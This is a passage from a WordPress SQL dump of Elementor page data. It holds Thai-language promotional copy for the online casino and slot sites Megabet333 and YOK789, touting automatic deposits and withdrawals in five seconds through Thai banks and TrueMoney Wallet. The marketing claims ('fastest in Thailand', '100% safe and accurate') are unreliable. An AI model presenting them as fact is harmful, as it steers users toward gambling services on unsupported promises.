1a\\u0e1d\\u0e32\\u0e01\\u0e16\\u0e2d\\u0e19\\u0e2d\\u0e2d\\u0e42\\u0e15\\u0e49\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e04\\u0e32\\u0e2a\\u0e34\\u0e42\\u0e19\\u0e2d\\u0e2d\\u0e19\\u0e44\\u0e25\\u0e19\\u0e4c Megabet333 \\u0e16\\u0e36\\u0e07\\u0e40\\u0e23\\u0e47\\u0e27\\u0e01\\u0e27\\u0e48\\u0e32\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2d\\u0e37\\u0e48\\u0e19\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"d9b3a68\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p data-start=\\\"2289\\\" data-end=\\\"2531\\\">\\u0e2a\\u0e34\\u0e48\\u0e07\\u0e17\\u0e35\\u0e48\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49 Megabet333 \\u0e42\\u0e14\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e40\\u0e2b\\u0e19\\u0e37\\u0e2d\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2d\\u0e37\\u0e48\\u0e19 \\u0e04\\u0e37\\u0e2d\\u0e01\\u0e32\\u0e23\\u0e43\\u0e0a\\u0e49\\u0e40\\u0e17\\u0e04\\u0e42\\u0e19\\u0e42\\u0e25\\u0e22\\u0e35 <strong data-start=\\\"2353\\\" data-end=\\\"2380\\\">Auto Transaction System<\\/strong> \\u0e17\\u0e35\\u0e48\\u0e40\\u0e0a\\u0e37\\u0e48\\u0e2d\\u0e21\\u0e15\\u0e48\\u0e2d\\u0e42\\u0e14\\u0e22\\u0e15\\u0e23\\u0e07\\u0e01\\u0e31\\u0e1a\\u0e18\\u0e19\\u0e32\\u0e04\\u0e32\\u0e23\\u0e41\\u0e25\\u0e30\\u0e1c\\u0e39\\u0e49\\u0e43\\u0e2b\\u0e49\\u0e1a\\u0e23\\u0e34\\u0e01\\u0e32\\u0e23\\u0e27\\u0e2d\\u0e40\\u0e25\\u0e17\\u0e43\\u0e19\\u0e1b\\u0e23\\u0e30\\u0e40\\u0e17\\u0e28\\u0e44\\u0e17\\u0e22 \\u0e0b\\u0e36\\u0e48\\u0e07\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e19\\u0e35\\u0e49\\u0e16\\u0e39\\u0e01\\u0e19\\u0e33\\u0e40\\u0e02\\u0e49\\u0e32\\u0e08\\u0e32\\u0e01 USA \\u0e41\\u0e25\\u0e30\\u0e44\\u0e14\\u0e49\\u0e23\\u0e31\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e1b\\u0e23\\u0e31\\u0e1a\\u0e41\\u0e15\\u0e48\\u0e07\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e01\\u0e31\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e43\\u0e0a\\u0e49\\u0e07\\u0e32\\u0e19\\u0e02\\u0e2d\\u0e07\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e17\\u0e22\\u0e42\\u0e14\\u0e22\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30<\\/p><p data-start=\\\"2533\\\" data-end=\\\"2575\\\"><span style=\\\"text-decoration: underline;\\\"><strong>\\u0e08\\u0e38\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e02\\u0e2d\\u0e07\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e1d\\u0e32\\u0e01\\u0e16\\u0e2d\\u0e19\\u0e2d\\u0e2d\\u0e42\\u0e15\\u0e49 Megabet333<\\/strong><\\/span><\\/p><ul><li data-start=\\\"2578\\\" data-end=\\\"2668\\\"><strong data-start=\\\"2578\\\" data-end=\\\"2617\\\">\\u0e40\\u0e0a\\u0e37\\u0e48\\u0e2d\\u0e21\\u0e15\\u0e48\\u0e2d\\u0e42\\u0e14\\u0e22\\u0e15\\u0e23\\u0e07\\u0e01\\u0e31\\u0e1a\\u0e18\\u0e19\\u0e32\\u0e04\\u0e32\\u0e23\\u0e2b\\u0e25\\u0e31\\u0e01\\u0e17\\u0e38\\u0e01\\u0e41\\u0e2b\\u0e48\\u0e07<\\/strong> \\u0e40\\u0e0a\\u0e48\\u0e19 \\u0e01\\u0e2a\\u0e34\\u0e01\\u0e23\\u0e44\\u0e17\\u0e22, \\u0e01\\u0e23\\u0e38\\u0e07\\u0e40\\u0e17\\u0e1e, \\u0e44\\u0e17\\u0e22\\u0e1e\\u0e32\\u0e13\\u0e34\\u0e0a\\u0e22\\u0e4c, \\u0e01\\u0e23\\u0e38\\u0e07\\u0e28\\u0e23\\u0e35\\u0e2f \\u0e2f\\u0e25\\u0e2f<\\/li><li data-start=\\\"2671\\\" data-end=\\\"2753\\\"><strong data-start=\\\"2671\\\" data-end=\\\"2707\\\">\\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a TrueMoney Wallet \\u0e40\\u0e15\\u0e47\\u0e21\\u0e23\\u0e30\\u0e1a\\u0e1a<\\/strong> \\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e17\\u0e35\\u0e48\\u0e44\\u0e21\\u0e48\\u0e2a\\u0e30\\u0e14\\u0e27\\u0e01\\u0e43\\u0e0a\\u0e49\\u0e1a\\u0e31\\u0e0d\\u0e0a\\u0e35\\u0e18\\u0e19\\u0e32\\u0e04\\u0e32\\u0e23<\\/li><li data-start=\\\"2756\\\" data-end=\\\"2796\\\"><strong data-start=\\\"2756\\\" data-end=\\\"2794\\\">\\u0e15\\u0e23\\u0e27\\u0e08\\u0e08\\u0e31\\u0e1a\\u0e22\\u0e2d\\u0e14\\u0e1d\\u0e32\\u0e01\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35\\u0e14\\u0e49\\u0e27\\u0e22 AI \\u0e2d\\u0e31\\u0e08\\u0e09\\u0e23\\u0e34\\u0e22\\u0e30<\\/strong><\\/li><li data-start=\\\"2799\\\" data-end=\\\"2866\\\"><strong data-start=\\\"2799\\\" data-end=\\\"2840\\\">\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e04\\u0e27\\u0e32\\u0e21\\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22\\u0e2a\\u0e39\\u0e07\\u0e2a\\u0e38\\u0e14\\u0e41\\u0e1a\\u0e1a 2 \\u0e0a\\u0e31\\u0e49\\u0e19 (2FA)<\\/strong> \\u0e1b\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e31\\u0e19\\u0e01\\u0e32\\u0e23\\u0e42\\u0e08\\u0e23\\u0e01\\u0e23\\u0e23\\u0e21\\u0e02\\u0e49\\u0e2d\\u0e21\\u0e39\\u0e25<\\/li><li data-start=\\\"2869\\\" data-end=\\\"2919\\\"><strong data-start=\\\"2869\\\" data-end=\\\"2903\\\">\\u0e43\\u0e0a\\u0e49\\u0e40\\u0e27\\u0e25\\u0e32\\u0e40\\u0e1e\\u0e35\\u0e22\\u0e07 5 \\u0e27\\u0e34\\u0e19\\u0e32\\u0e17\\u0e35\\u0e15\\u0e48\\u0e2d\\u0e23\\u0e32\\u0e22\\u0e01\\u0e32\\u0e23<\\/strong> \\u0e17\\u0e31\\u0e49\\u0e07\\u0e1d\\u0e32\\u0e01\\u0e41\\u0e25\\u0e30\\u0e16\\u0e2d\\u0e19<\\/li><\\/ul><blockquote><p style=\\\"text-align: center;\\\" data-start=\\\"2921\\\" data-end=\\\"3018\\\"><em><strong><span style=\\\"color: #ffcc00;\\\">\\u0e14\\u0e49\\u0e27\\u0e22\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e19\\u0e35\\u0e49 Megabet333 \\u0e08\\u0e36\\u0e07\\u0e01\\u0e25\\u0e32\\u0e22\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e1e\\u0e19\\u0e31\\u0e19\\u0e17\\u0e35\\u0e48\\u0e17\\u0e31\\u0e49\\u0e07 \\u201c\\u0e40\\u0e23\\u0e47\\u0e27\\u201d \\u0e41\\u0e25\\u0e30 \\u201c\\u0e40\\u0e2a\\u0e16\\u0e35\\u0e22\\u0e23\\u201d \\u0e17\\u0e35\\u0e48\\u0e2a\\u0e38\\u0e14\\u0e43\\u0e19\\u0e1b\\u0e23\\u0e30\\u0e40\\u0e17\\u0e28\\u0e44\\u0e17\\u0e22\\u0e43\\u0e19\\u0e02\\u0e13\\u0e30\\u0e19\\u0e35\\u0e49<\\/span><\\/strong><\\/em><\\/p><\\/blockquote>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(2228,312,'_thumbnail_id','293'),(2232,313,'_elementor_edit_mode','builder'),(2233,313,'_elementor_template_type','wp-page'),(2234,313,'_elementor_version','3.32.5'),(2235,313,'_elementor_pro_version','3.32.3'),(2236,313,'_wp_page_template','default'),(2237,313,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(2238,313,'_elementor_data','[{\"id\":\"3ffd0d3\",\"elType\":\"section\",\"settings\":{\"margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":0,\"bottom\":\"10\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"e0d3c94\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"70ef781\",\"elType\":\"widget\",\"settings\":{\"title\":\"Megabet333 \\u0e1d\\u0e32\\u0e01\\u0e16\\u0e2d\\u0e19\\u0e2d\\u0e2d\\u0e42\\u0e15\\u0e49 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e23\\u0e47\\u0e27\\u0e2a\\u0e38\\u0e14\\u0e43\\u0e19\\u0e44\\u0e17\\u0e22 \\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e48\\u0e33 5 \\u0e27\\u0e34\\u0e40\\u0e07\\u0e34\\u0e19\\u0e40\\u0e02\\u0e49\\u0e32\",\"header_size\":\"h1\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"0cb3fb0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p data-start=\\\"355\\\" data-end=\\\"698\\\">\\u0e43\\u0e19\\u0e22\\u0e38\\u0e04\\u0e19\\u0e35\\u0e49 2025 \\u0e40\\u0e23\\u0e35\\u0e22\\u0e19\\u0e01\\u0e44\\u0e14\\u0e49\\u0e27\\u0e48\\u0e32\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e22\\u0e38\\u0e04\\u0e41\\u0e2b\\u0e48\\u0e07\\u0e40\\u0e17\\u0e04\\u0e42\\u0e19\\u0e42\\u0e25\\u0e22\\u0e35\\u0e40\\u0e25\\u0e22\\u0e01\\u0e47\\u0e44\\u0e14\\u0e49\\u0e27\\u0e48\\u0e32 \\u0e22\\u0e38\\u0e04\\u0e17\\u0e35\\u0e48\\u0e17\\u0e38\\u0e01\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e23\\u0e47\\u0e27\\u0e41\\u0e25\\u0e30\\u0e2a\\u0e30\\u0e14\\u0e27\\u0e01 \\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e15\\u0e23\\u0e07 megabet\\u00a0\\u0e40\\u0e2d\\u0e07\\u0e01\\u0e47\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e1b\\u0e23\\u0e31\\u0e1a\\u0e15\\u0e31\\u0e27\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e31\\u0e19\\u0e2a\\u0e21\\u0e31\\u0e22\\u0e40\\u0e0a\\u0e48\\u0e19\\u0e01\\u0e31\\u0e19 \\u0e41\\u0e25\\u0e30\\u0e2b\\u0e19\\u0e36\\u0e48\\u0e07\\u0e43\\u0e19\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1b\\u0e25\\u0e35\\u0e48\\u0e22\\u0e19\\u0e1b\\u0e23\\u0e30\\u0e2a\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e13\\u0e4c\\u0e01\\u0e32\\u0e23\\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e01\\u0e21\\u0e02\\u0e2d\\u0e07\\u0e19\\u0e31\\u0e01\\u0e40\\u0e14\\u0e34\\u0e21\\u0e1e\\u0e31\\u0e19\\u0e44\\u0e17\\u0e22\\u0e44\\u0e1b\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e2a\\u0e34\\u0e49\\u0e19\\u0e40\\u0e0a\\u0e34\\u0e07\\u0e01\\u0e47\\u0e04\\u0e37\\u0e2d \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e1d\\u0e32\\u0e01\\u0e16\\u0e2d\\u0e19\\u0e2d\\u0e2d\\u0e42\\u0e15\\u0e49\\u0e08\\u0e32\\u0e01\\u0e40\\u0e27\\u0e47\\u0e1a Megabet333 \\u0e17\\u0e35\\u0e48\\u0e02\\u0e36\\u0e49\\u0e19\\u0e0a\\u0e37\\u0e48\\u0e2d\\u0e27\\u0e48\\u0e32\\u0e40\\u0e23\\u0e47\\u0e27\\u0e17\\u0e35\\u0e48\\u0e2a\\u0e38\\u0e14\\u0e43\\u0e19\\u0e44\\u0e17\\u0e22 \\u0e43\\u0e0a\\u0e49\\u0e40\\u0e27\\u0e25\\u0e32\\u0e40\\u0e1e\\u0e35\\u0e22\\u0e07 5 \\u0e27\\u0e34\\u0e19\\u0e32\\u0e17\\u0e35\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19 \\u0e40\\u0e07\\u0e34\\u0e19\\u0e01\\u0e47\\u0e40\\u0e02\\u0e49\\u0e32\\u0e1a\\u0e31\\u0e0d\\u0e0a\\u0e35\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35 \\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e23\\u0e2d\\u0e41\\u0e2d\\u0e14\\u0e21\\u0e34\\u0e19 \\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e2a\\u0e48\\u0e07\\u0e2a\\u0e25\\u0e34\\u0e1b\\u0e43\\u0e2b\\u0e49\\u0e22\\u0e38\\u0e48\\u0e07\\u0e22\\u0e32\\u0e01\\u0e2d\\u0e35\\u0e01\\u0e15\\u0e48\\u0e2d\\u0e44\\u0e1b \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e40\\u0e21\\u0e01\\u0e49\\u0e32\\u0e40\\u0e1a\\u0e17\\u0e16\\u0e37\\u0e2d\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e1c\\u0e39\\u0e49\\u0e19\\u0e33\\u0e14\\u0e49\\u0e32\\u0e19\\u0e40\\u0e17\\u0e04\\u0e42\\u0e19\\u0e42\\u0e25\\u0e22\\u0e35\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e2d\\u0e31\\u0e15\\u0e42\\u0e19\\u0e21\\u0e31\\u0e15\\u0e34\\u0e43\\u0e19\\u0e27\\u0e07\\u0e01\\u0e32\\u0e23\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e2d\\u0e2d\\u0e19\\u0e44\\u0e25\\u0e19\\u0e4c \\u0e14\\u0e49\\u0e27\\u0e22\\u0e01\\u0e32\\u0e23\\u0e1e\\u0e31\\u0e12\\u0e19\\u0e32\\u0e41\\u0e1e\\u0e25\\u0e15\\u0e1f\\u0e2d\\u0e23\\u0e4c\\u0e21\\u0e40\\u0e0a\\u0e37\\u0e48\\u0e2d\\u0e21\\u0e15\\u0e48\\u0e2d\\u0e01\\u0e31\\u0e1a API \\u0e08\\u0e32\\u0e01\\u0e1c\\u0e39\\u0e49\\u0e43\\u0e2b\\u0e49\\u0e1a\\u0e23\\u0e34\\u0e01\\u0e32\\u0e23\\u0e18\\u0e19\\u0e32\\u0e04\\u0e32\\u0e23\\u0e42\\u0e14\\u0e22\\u0e15\\u0e23\\u0e07 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e1d\\u0e32\\u0e01\\u0e16\\u0e2d\\u0e19\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e23\\u0e35\\u0e22\\u0e25\\u0e44\\u0e17\\u0e21\\u0e4c \\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22 \\u0e41\\u0e25\\u0e30\\u0e41\\u0e21\\u0e48\\u0e19\\u0e22\\u0e33 100% \\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e04\\u0e38\\u0e13\\u0e08\\u0e30\\u0e1d\\u0e32\\u0e01\\u0e2b\\u0e25\\u0e31\\u0e01\\u0e2a\\u0e34\\u0e1a\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e16\\u0e2d\\u0e19\\u0e2b\\u0e25\\u0e31\\u0e01\\u0e41\\u0e2a\\u0e19 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e01\\u0e47\\u0e1b\\u0e23\\u0e30\\u0e21\\u0e27\\u0e25\\u0e1c\\u0e25\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35 \\u0e0a\\u0e48\\u0e27\\u0e22\\u0e43\\u0e2b\\u0e49\\u0e04\\u0e38\\u0e13\\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e44\\u0e14\\u0e49\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e2a\\u0e30\\u0e14\\u0e38\\u0e14<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"11898c9\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/3icon_-_Megabet333-Biz.webp\",\"id\":50,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":70,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"1741422\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e17\\u0e33\\u0e44\\u0e21\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e1d\\u0e32\\u0e01\\u0e16\\u0e2d\\u0e19\\u0e2d\\u0e2d\\u0e42\\u0e15\\u0e49\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e04\\u0e32\\u0e2a\\u0e34\\u0e42\\u0e19\\u0e2d\\u0e2d\\u0e19\\u0e44\\u0e25\\u0e19\\u0e4c Megabet333 \\u0e16\\u0e36\\u0e07\\u0e40\\u0e23\\u0e47\\u0e27\\u0e01\\u0e27\\u0e48\\u0e32\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2d\\u0e37\\u0e48\\u0e19\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"d9b3a68\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p data-start=\\\"2289\\\" data-end=\\\"2531\\\">\\u0e2a\\u0e34\\u0e48\\u0e07\\u0e17\\u0e35\\u0e48\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49 Megabet333 \\u0e42\\u0e14\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e40\\u0e2b\\u0e19\\u0e37\\u0e2d\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2d\\u0e37\\u0e48\\u0e19 \\u0e04\\u0e37\\u0e2d\\u0e01\\u0e32\\u0e23\\u0e43\\u0e0a\\u0e49\\u0e40\\u0e17\\u0e04\\u0e42\\u0e19\\u0e42\\u0e25\\u0e22\\u0e35 <strong data-start=\\\"2353\\\" data-end=\\\"2380\\\">Auto Transaction System<\\/strong> \\u0e17\\u0e35\\u0e48\\u0e40\\u0e0a\\u0e37\\u0e48\\u0e2d\\u0e21\\u0e15\\u0e48\\u0e2d\\u0e42\\u0e14\\u0e22\\u0e15\\u0e23\\u0e07\\u0e01\\u0e31\\u0e1a\\u0e18\\u0e19\\u0e32\\u0e04\\u0e32\\u0e23\\u0e41\\u0e25\\u0e30\\u0e1c\\u0e39\\u0e49\\u0e43\\u0e2b\\u0e49\\u0e1a\\u0e23\\u0e34\\u0e01\\u0e32\\u0e23\\u0e27\\u0e2d\\u0e40\\u0e25\\u0e17\\u0e43\\u0e19\\u0e1b\\u0e23\\u0e30\\u0e40\\u0e17\\u0e28\\u0e44\\u0e17\\u0e22 \\u0e0b\\u0e36\\u0e48\\u0e07\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e19\\u0e35\\u0e49\\u0e16\\u0e39\\u0e01\\u0e19\\u0e33\\u0e40\\u0e02\\u0e49\\u0e32\\u0e08\\u0e32\\u0e01 USA \\u0e41\\u0e25\\u0e30\\u0e44\\u0e14\\u0e49\\u0e23\\u0e31\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e1b\\u0e23\\u0e31\\u0e1a\\u0e41\\u0e15\\u0e48\\u0e07\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e01\\u0e31\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e43\\u0e0a\\u0e49\\u0e07\\u0e32\\u0e19\\u0e02\\u0e2d\\u0e07\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e17\\u0e22\\u0e42\\u0e14\\u0e22\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30<\\/p><p data-start=\\\"2533\\\" data-end=\\\"2575\\\"><span style=\\\"text-decoration: underline;\\\"><strong>\\u0e08\\u0e38\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e02\\u0e2d\\u0e07\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e1d\\u0e32\\u0e01\\u0e16\\u0e2d\\u0e19\\u0e2d\\u0e2d\\u0e42\\u0e15\\u0e49 Megabet333<\\/strong><\\/span><\\/p><ul><li data-start=\\\"2578\\\" data-end=\\\"2668\\\"><strong data-start=\\\"2578\\\" data-end=\\\"2617\\\">\\u0e40\\u0e0a\\u0e37\\u0e48\\u0e2d\\u0e21\\u0e15\\u0e48\\u0e2d\\u0e42\\u0e14\\u0e22\\u0e15\\u0e23\\u0e07\\u0e01\\u0e31\\u0e1a\\u0e18\\u0e19\\u0e32\\u0e04\\u0e32\\u0e23\\u0e2b\\u0e25\\u0e31\\u0e01\\u0e17\\u0e38\\u0e01\\u0e41\\u0e2b\\u0e48\\u0e07<\\/strong> \\u0e40\\u0e0a\\u0e48\\u0e19 \\u0e01\\u0e2a\\u0e34\\u0e01\\u0e23\\u0e44\\u0e17\\u0e22, \\u0e01\\u0e23\\u0e38\\u0e07\\u0e40\\u0e17\\u0e1e, \\u0e44\\u0e17\\u0e22\\u0e1e\\u0e32\\u0e13\\u0e34\\u0e0a\\u0e22\\u0e4c, \\u0e01\\u0e23\\u0e38\\u0e07\\u0e28\\u0e23\\u0e35\\u0e2f \\u0e2f\\u0e25\\u0e2f<\\/li><li data-start=\\\"2671\\\" data-end=\\\"2753\\\"><strong data-start=\\\"2671\\\" data-end=\\\"2707\\\">\\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a TrueMoney Wallet \\u0e40\\u0e15\\u0e47\\u0e21\\u0e23\\u0e30\\u0e1a\\u0e1a<\\/strong> \\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e17\\u0e35\\u0e48\\u0e44\\u0e21\\u0e48\\u0e2a\\u0e30\\u0e14\\u0e27\\u0e01\\u0e43\\u0e0a\\u0e49\\u0e1a\\u0e31\\u0e0d\\u0e0a\\u0e35\\u0e18\\u0e19\\u0e32\\u0e04\\u0e32\\u0e23<\\/li><li data-start=\\\"2756\\\" data-end=\\\"2796\\\"><strong data-start=\\\"2756\\\" data-end=\\\"2794\\\">\\u0e15\\u0e23\\u0e27\\u0e08\\u0e08\\u0e31\\u0e1a\\u0e22\\u0e2d\\u0e14\\u0e1d\\u0e32\\u0e01\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35\\u0e14\\u0e49\\u0e27\\u0e22 AI \\u0e2d\\u0e31\\u0e08\\u0e09\\u0e23\\u0e34\\u0e22\\u0e30<\\/strong><\\/li><li data-start=\\\"2799\\\" data-end=\\\"2866\\\"><strong data-start=\\\"2799\\\" data-end=\\\"2840\\\">\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e04\\u0e27\\u0e32\\u0e21\\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22\\u0e2a\\u0e39\\u0e07\\u0e2a\\u0e38\\u0e14\\u0e41\\u0e1a\\u0e1a 2 \\u0e0a\\u0e31\\u0e49\\u0e19 (2FA)<\\/strong> \\u0e1b\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e31\\u0e19\\u0e01\\u0e32\\u0e23\\u0e42\\u0e08\\u0e23\\u0e01\\u0e23\\u0e23\\u0e21\\u0e02\\u0e49\\u0e2d\\u0e21\\u0e39\\u0e25<\\/li><li data-start=\\\"2869\\\" data-end=\\\"2919\\\"><strong data-start=\\\"2869\\\" data-end=\\\"2903\\\">\\u0e43\\u0e0a\\u0e49\\u0e40\\u0e27\\u0e25\\u0e32\\u0e40\\u0e1e\\u0e35\\u0e22\\u0e07 5 \\u0e27\\u0e34\\u0e19\\u0e32\\u0e17\\u0e35\\u0e15\\u0e48\\u0e2d\\u0e23\\u0e32\\u0e22\\u0e01\\u0e32\\u0e23<\\/strong> \\u0e17\\u0e31\\u0e49\\u0e07\\u0e1d\\u0e32\\u0e01\\u0e41\\u0e25\\u0e30\\u0e16\\u0e2d\\u0e19<\\/li><\\/ul><blockquote><p style=\\\"text-align: center;\\\" data-start=\\\"2921\\\" data-end=\\\"3018\\\"><em><strong><span style=\\\"color: #ffcc00;\\\">\\u0e14\\u0e49\\u0e27\\u0e22\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e19\\u0e35\\u0e49 Megabet333 \\u0e08\\u0e36\\u0e07\\u0e01\\u0e25\\u0e32\\u0e22\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e1e\\u0e19\\u0e31\\u0e19\\u0e17\\u0e35\\u0e48\\u0e17\\u0e31\\u0e49\\u0e07 \\u201c\\u0e40\\u0e23\\u0e47\\u0e27\\u201d \\u0e41\\u0e25\\u0e30 \\u201c\\u0e40\\u0e2a\\u0e16\\u0e35\\u0e22\\u0e23\\u201d \\u0e17\\u0e35\\u0e48\\u0e2a\\u0e38\\u0e14\\u0e43\\u0e19\\u0e1b\\u0e23\\u0e30\\u0e40\\u0e17\\u0e28\\u0e44\\u0e17\\u0e22\\u0e43\\u0e19\\u0e02\\u0e13\\u0e30\\u0e19\\u0e35\\u0e49<\\/span><\\/strong><\\/em><\\/p><\\/blockquote>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(2239,313,'_thumbnail_id','293'),(2243,314,'_elementor_edit_mode','builder'),(2244,314,'_elementor_template_type','wp-page'),(2245,314,'_elementor_version','3.32.5'),(2246,314,'_elementor_pro_version','3.32.3'),(2247,314,'_wp_page_template','default'),(2248,314,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(2249,314,'_elementor_data','[{\"id\":\"3ffd0d3\",\"elType\":\"section\",\"settings\":{\"margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":0,\"bottom\":\"10\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"e0d3c94\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"70ef781\",\"elType\":\"widget\",\"settings\":{\"title\":\"YOK789 \\u0e1d\\u0e32\\u0e01\\u0e16\\u0e2d\\u0e19\\u0e2d\\u0e2d\\u0e42\\u0e15\\u0e49\\u0e17\\u0e31\\u0e19\\u0e2a\\u0e21\\u0e31\\u0e22 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e23\\u0e47\\u0e27\\u0e2a\\u0e38\\u0e14\\u0e43\\u0e19\\u0e44\\u0e17\\u0e22 \\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e48\\u0e33 5 \\u0e27\\u0e34\\u0e40\\u0e07\\u0e34\\u0e19\\u0e40\\u0e02\\u0e49\\u0e32\",\"header_size\":\"h1\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"0cb3fb0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p data-pm-slice=\\\"0 0 